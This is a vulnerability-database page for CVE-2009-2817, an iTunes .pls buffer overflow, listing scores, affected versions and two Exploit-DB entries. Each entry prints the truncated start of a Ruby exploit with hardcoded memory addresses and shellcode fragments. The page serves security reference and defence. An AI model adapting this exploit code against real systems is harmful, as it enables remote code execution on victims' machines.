CVE-2009-2817
published 2009-09-24CVE-2009-2817: Buffer overflow in Apple iTunes before 9.0.1 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted…
PriorityP348critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
8.95%
94.6th percentile
Buffer overflow in Apple iTunes before 9.0.1 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted .pls file.
Affected
73 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apple | itunes | <= 9.0 | — |
| apple | itunes | — | — |
| apple | itunes | — | — |
| apple | itunes | — | — |
| apple | itunes | — | — |
| apple | itunes | — | — |
| apple | itunes | — | — |
| apple | itunes | — | — |
| apple | itunes | — | — |
| apple | itunes | — | — |
| apple | itunes | — | — |
| apple | itunes | — | — |
| apple | itunes | — | — |
| apple | itunes | — | — |
| apple | itunes | — | — |
| apple | itunes | — | — |
| apple | itunes | — | — |
| apple | itunes | — | — |
| apple | itunes | — | — |
| apple | itunes | — | — |
| apple | itunes | — | — |
| apple | itunes | — | — |
| apple | itunes | — | — |
| apple | itunes | — | — |
| apple | itunes | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Apple iTunes 9.0.1 - '.pls' Handling Buffer Overflow
exploitdb·2010-02-17·CVSS 9.3
CVE-2009-2817 [CRITICAL] Apple iTunes 9.0.1 - '.pls' Handling Buffer Overflow
Apple iTunes 9.0.1 - '.pls' Handling Buffer Overflow
---
# Exploit Title: iTunes .pls file handling buffer overflow
# Date: 2009.12.20
# Author: S2 Crew [Hungary]
# Software Link: -
# Version: 9.0
# Tested on: OSX 10.5.8, Windows XP SP2 (/GS flag, DOS)
# CVE: CVE-2009-2817
# Code:
#!/usr/bin/env ruby
SETJMP = 0x92F04224
JMP_BUF = 0x8fe31290
STRDUP = 0x92EED110
# 8fe24459 jmp *%eax
JMP_EAX = 0x8fe24459
def make_exec_payload_from_heap_stub()
frag0 =
"\x90" + # nop
"\x58" + # pop eax
"\x61" + # popa
"\xc3" # ret
frag1 =
"\x90" + # nop
"\x58" + # pop eax
"\x89\xe0" + # mov eax, esp
"\x83\xc0\x0c" + # add eax, byte +0xc
"\x89\x44\x24\x08" + # mov [esp+0x8], eax
"\xc3" # ret
exec_payload_from_heap_stub =
frag0 +
[SETJMP, JMP_BUF + 32, JMP_BUF].pack("V3") +
frag1 +
"X" * 20 +
[SETJMP, JMP_B
Exploit-DB
Apple iTunes 9.0 - '.pls' Buffer Overflow
exploitdb·2009-09-22
CVE-2009-2817 Apple iTunes 9.0 - '.pls' Buffer Overflow
Apple iTunes 9.0 - '.pls' Buffer Overflow
---
source: https://www.securityfocus.com/bid/36478/info
Apple iTunes is prone to a buffer-overflow vulnerability because the software fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer.
An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
Versions prior to Apple iTunes 9.0.1 are vulnerable.
#!/usr/bin/env ruby
SETJMP = 0x92F04224
JMP_BUF = 0x8fe31290
STRDUP = 0x92EED110
# 8fe24459 jmp *%eax
JMP_EAX = 0x8fe24459
def make_exec_payload_from_heap_stub()
frag0 =
"\x90" + # nop
"\x58" + # pop eax
"\x61" + # popa
"\xc3" # ret
frag1 =
"\x90" + # nop
"\x58" + # pop eax
"\x89\xe0" +
No writeups or analysis indexed.
http://lists.apple.com/archives/security-announce/2009/Sep/msg00006.htmlhttp://support.apple.com/kb/HT3884http://www.securityfocus.com/bid/36478https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A6290http://lists.apple.com/archives/security-announce/2009/Sep/msg00006.htmlhttp://support.apple.com/kb/HT3884http://www.securityfocus.com/bid/36478https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A6290
2009-09-24
Published